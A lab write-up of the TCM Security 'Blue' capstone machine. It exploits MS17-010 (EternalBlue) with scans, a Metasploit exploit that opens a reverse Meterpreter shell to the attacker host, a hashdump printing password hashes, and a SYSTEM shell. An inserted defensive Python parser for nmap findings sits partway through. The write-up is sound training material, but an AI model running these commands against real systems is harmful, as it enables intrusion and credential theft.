Writeup: TCM PEH Capstone Blue
By SecBurg
This is a quick and dirty writeup for the Practical Ethical Hacking Course capstone machine called “Blue” on the TCM Security Academy.
It is a very easy one, because the machine is vulnerable to “EternalBlue” (MS17-010).
- scan for open ports and system info:
> rustscan -a 10.30.30.103 -- -A
Open 10.30.30.103:135
Open 10.30.30.103:139
Open 10.30.30.103:445
[...]
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
[...]
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
[...]
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-09T04:12:17-04:00
- nmap scan (alternatively a metasploit scan) for smb vulnerabilities:
> nmap -p 139,445 --script smb-vuln* 10.30.30.103
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: BC:24:11:FA:23:4F (Proxmox Server Solutions GmbH)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
- vulnerable to MS17-010 (Eternal Blue)!
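As an added example (not part of the original writeup), here is a small Python parser for the `Host script results` block that nmap's `smb-vuln*` scripts print, so a defender can turn scan output like the one above into structured findings (state, CVE ids, risk, disclosure date, references) for a ticket or a patch queue instead of eyeballing it. The sample input is the nmap output copied from this writeup; the function and variable names are my own, and the remediation text is a general note, not something the page states.

```python
import re

# Sample input: the nmap "Host script results" block from the writeup above
# (constructed here as a literal so the script runs offline).
NMAP_OUTPUT = """\
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

# Remediation hints keyed by NSE script name (assumed mapping for this example).
REMEDIATION = {
    "smb-vuln-ms17-010": "Apply the MS17-010 update and disable SMBv1.",
}

# NSE output lines start with "| " (continuation) or "|_" (last line of a script).
NSE_LINE = re.compile(r"^\|_?\s?(.*)$")
SCRIPT_HEADER = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
CVE_ID = re.compile(r"CVE-\d{4}-\d+")


def new_finding():
    return {"state": None, "ids": [], "risk": None, "disclosure": None, "references": []}


def parse_smb_vuln(output):
    """Parse nmap smb-vuln* script output into {script_name: finding}."""
    findings = {}
    current = None
    in_refs = False
    for raw in output.splitlines():
        m = NSE_LINE.match(raw)
        if not m:
            continue  # e.g. "Host script results:" is not a script line
        line = m.group(1).strip()
        hdr = SCRIPT_HEADER.match(line)
        if hdr:
            name, value = hdr.groups()
            current = findings.setdefault(name, new_finding())
            if value:  # one-line result such as "false" or an NT_STATUS error
                current["state"] = value
            in_refs = False
            continue
        if current is None:
            continue
        if line.startswith("State:"):
            current["state"] = line.split(":", 1)[1].strip()
        elif line.startswith("IDs:"):
            current["ids"] = CVE_ID.findall(line)
        elif line.startswith("Risk factor:"):
            current["risk"] = line.split(":", 1)[1].strip()
        elif line.startswith("Disclosure date:"):
            current["disclosure"] = line.split(":", 1)[1].strip()
        elif line.startswith("References:"):
            in_refs = True
        elif in_refs and line.startswith("http"):
            current["references"].append(line)
    return findings


def confirmed_vulnerabilities(findings):
    """Return [(script, cve_ids, remediation)] for scripts that reported VULNERABLE."""
    return [
        (name, f["ids"], REMEDIATION.get(name, "No remediation note on file."))
        for name, f in findings.items()
        if f["state"] == "VULNERABLE"
    ]


if __name__ == "__main__":
    for name, cves, fix in confirmed_vulnerabilities(parse_smb_vuln(NMAP_OUTPUT)):
        print(f"{name}: {', '.join(cves)} -> {fix}")
```

Scripts that return `false` or an `NT_STATUS_*` error are kept in the result with that value as their state, so a "not vulnerable" and a "check could not run" outcome stay distinguishable when the findings are reviewed later.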
- confirm with metasploit:
> msfconsole
> use auxiliary/scanner/smb/smb_ms17_010
> options
> set rhosts 10.30.30.103
> run
[+] 10.30.30.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.30.30.103:445 - Scanned 1 of 1 hosts (100% complete)
- exploit with metasploit:
> use exploit/windows/smb/ms17_010_eternalblue
> set rhost 10.30.30.103
> run
[*] Started reverse TCP handler on 10.30.30.102:4444
[*] 10.30.30.103:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.30.30.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.30.30.103:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.30.30.103:445 - The target is vulnerable.
[*] 10.30.30.103:445 - Connecting to target for exploitation.
[+] 10.30.30.103:445 - Connection established for exploitation.
[...]
[*] Sending stage (203846 bytes) to 10.30.30.103
[*] Meterpreter session 1 opened (10.30.30.102:4444 -> 10.30.30.103:49158) at 2025-03-09 09:27:30 +0100
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb:::
user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
meterpreter > shell
Process 1392 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
… and that’s it! :-)